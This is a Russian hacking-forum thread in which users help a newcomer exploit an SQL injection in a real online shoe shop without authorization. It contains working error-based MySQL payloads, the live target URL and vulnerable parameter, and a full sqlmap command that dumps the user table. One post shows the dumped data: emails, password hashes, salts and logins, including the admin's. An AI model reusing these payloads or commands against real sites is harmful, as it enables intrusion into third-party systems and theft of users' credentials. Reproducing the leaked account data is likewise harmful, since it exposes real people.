Просмотр полной версии : Нашел инъекцию, а дальше???
Здравствуйте, коллеги Вообщем недавно решил помимо разработки сайтов научиться взламывать сайты. Нарыл один интересный интернет-магазин, и сразу же нашел SQL инъекцию.
http://storage3.static.itmages.ru/i/15/0826/h_1440551333_8174911_cd034d40ce.png
Вообщем что только не придумывал, и union прописывал и т.д.
Вылетает одна и та же хрень, ошибка синтаксиса. Инъекция работает если ставить " кавычку.
http://storage2.static.itmages.ru/i/15/0826/h_1440551296_9911745_79a5a0d2df.jpg
Какие еще могут быть варианты для взлома?
Пробуйте error based вектор. например:
'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1
или
'-updatexml(0,repeat(version(),2),2)#
Чувак я советую полностью тебе ссылку закрывать,я её через inurl нашёл .
↑ (https://antichat.live/posts/3884435/)
Чувак я советую полностью тебе ссылку закрывать,я её через inurl нашёл .
да все равно, кто нашел, тот молодец. Сайт я взломать пытаюсь не для корыстной цели, а для практики.
----------------------------------
↑ (https://antichat.live/posts/3884394/)
Пробуйте error based вектор. например:
'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1
или
'-updatexml(0,repeat(version(),2),2)#
Не помогло....
"))))||1+group+by+concat(version(),floor(rand(0)*2) )having+min(0)%23
в ошибке увидите версию
↑ (https://antichat.live/posts/3884931/)
"))))||1+group+by+concat(version(),floor(rand(0)*2) )having+min(0)%23
в ошибке увидите версию
Тоже не пашет .
BabaDook
27.08.2015, 17:45
↑ (https://antichat.live/posts/3884931/)
"))))||1+group+by+concat(version(),floor(rand(0)*2) )having+min(0)%23
в ошибке увидите версию
а какого типа эта инъекция, если можно манукльчик ))
↑ (https://antichat.live/posts/3884955/)
а какого типа эта инъекция, если можно манукльчик ))
error based
Вообщем кому интересно ломануть сайтик, а потом рассказать (поделиться опытом), как это сделал, вот ссыль - http://xn--80abd6ar5a2c.xn--p1ai/
Инъекция - http://xn--80abd6ar5a2c.xn--p1ai/shop/product/filter?productFilter[_ef][gender][]=Мужская" (http://xn--80abd6ar5a2c.xn--p1ai/shop/product/filter?productFilter[_ef][gender][]=%D0%9C%D1%83%D0%B6%D1%81%D0%BA%D0%B0%D1%8F%22)
↑ (https://antichat.live/posts/3884952/)
Тоже не пашет .
Пашет всё=)
↑ (https://antichat.live/posts/3885245/)
Пашет всё=)
что-то не получается
kingbeef
28.08.2015, 18:02
↑ (https://antichat.live/posts/3885329/)
что-то не получается
Убери одну скобку в запросе.
")))||1+group+by+concat(version(),floor(rand(0)*2)) having+min(0)%23
Надо ошибки тоже читать.
↑ (https://antichat.live/posts/3885332/)
Убери одну скобку в запросе.
")))||1+group+by+concat(version(),floor(rand(0)*2)) having+min(0)%23
Надо ошибки тоже читать.
красавчик ))
strelok20094
29.08.2015, 02:31
base: w106051
Table: user
[5 entries]
+----------------------+---------------+-------------------------------+-------------+
| email | password | salt | login |
+----------------------+---------------+-------------------------------+-------------+
| @ya.ru | $2nWSDmGDU.V6 | $2a$14$2JzmyFg/HuG55/xYBrIXMA | delvin |
| @altlogic.ru | $22dAubujSFfU | $2a$14$EnpIvtkw.xRbLRzjwbquxg | admin |
| @mail.ru | $2JpCew0SKvc. | $2a$14$ltDzAFvK5i0qU33i2nvaPg | durova_vita |
| @tagan.ru | $24LkUVLWIjU2 | $2a$14$tk2uQd0jCUpmApJ6kmSB/g | dmi |
| @gmail.com | $2KvStv//sqiM | $2a$14$VNPbpZZMDzNBW8Lt9JD6dw | obuvka |
+----------------------+---------------+-------------------------------+-------------+
sqlmap -u "http://обувъка.рф/shop/product/filter?productFilter[_ef][gender][]="* (http://обувъка.рф/shop/product/filter?productFilter[_ef][gender][]=%22*)" --dbms Mysql --time-sec 10 --threads 10 --level 3 --risk 3 --technique E -D w106051 -T user -C email,password,salt,login --dump
↑ (https://antichat.live/posts/3885440/)
base: w106051
Table: user
[5 entries]
+----------------------+---------------+-------------------------------+-------------+
| email | password | salt | login |
+----------------------+---------------+-------------------------------+-------------+
| @ya.ru | $2nWSDmGDU.V6 | $2a$14$2JzmyFg/HuG55/xYBrIXMA | delvin |
| @altlogic.ru | $22dAubujSFfU | $2a$14$EnpIvtkw.xRbLRzjwbquxg | admin |
| @mail.ru | $2JpCew0SKvc. | $2a$14$ltDzAFvK5i0qU33i2nvaPg | durova_vita |
| @tagan.ru | $24LkUVLWIjU2 | $2a$14$tk2uQd0jCUpmApJ6kmSB/g | dmi |
| @gmail.com | $2KvStv//sqiM | $2a$14$VNPbpZZMDzNBW8Lt9JD6dw | obuvka |
+----------------------+---------------+-------------------------------+-------------+
sqlmap -u "http://обувъка.рф/shop/product/filter?productFilter[_ef][gender][]="* (http://обувъка.рф/shop/product/filter?productFilter[_ef][gender][]=%22*)" --dbms Mysql --time-sec 10 --threads 10 --level 3 --risk 3 --technique E -D w106051 -T user -C email,password,salt,login --dump
Можете рассказать как сделали?
↑ (https://antichat.live/posts/3885448/)
Можете рассказать как сделали?
sqlmap гугли...
↑ (https://antichat.live/posts/3885482/)
sqlmap гугли...
От души
↑ (https://antichat.live/posts/3885575/)
От души
Так то думать надо .... читать ...
(sqlmap - хороший софт, но лучше учись сам раскручивать ИМХО.)
↑ (https://antichat.live/posts/3885684/)
Так то думать надо .... читать ...
(sqlmap - хороший софт, но лучше учись сам раскручивать ИМХО.)
зачем изобретать велосипед? есть софт он работает
по логу можно понять что происходит
а вот если автоматизация не прокатила то да имеет смысл копать руками!
п.с. имхо
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot